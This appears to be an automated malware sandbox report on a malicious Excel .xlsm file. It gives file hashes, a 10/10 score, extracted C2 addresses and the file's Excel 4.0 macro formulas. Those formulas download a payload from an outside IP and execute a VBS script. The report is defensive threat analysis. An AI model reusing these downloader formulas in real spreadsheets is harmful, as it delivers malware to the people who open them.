Overview

overview

10

Static

static

10

a589a27bc2...6.xlsm

windows7-x64

10

a589a27bc2...6.xlsm

windows10-2004-x64

10

Sharing

Copy URL Twitter E-mail

General

  • Target

    a589a27bc27d6a40b3aad096b5f0acf6

  • Size

    6KB

  • MD5

    a589a27bc27d6a40b3aad096b5f0acf6

  • SHA1

    350dcaea474bfbff8051936566ceee1ce1d59f44

  • SHA256

    d3453f72d53cb2eaa2eba49215be4b817871f7aa6ccc6c7595822912a46effe9

  • SHA512

    76bc597cbc1f45c9dcaa62774d3a230a52c45d555c0cdf572448d949b061f72ff82a12720a948bf422162ba6f17c741a7169df396d146c7d0391fcaf2d6a570a

  • SSDEEP

    192:NDSWuSQbrA2OmmfRH8UhHFBFYuZb98yju+l:N1uFM2wx1FYYb98yj5

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php
Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

  • a589a27bc27d6a40b3aad096b5f0acf6
    .xlsm office2007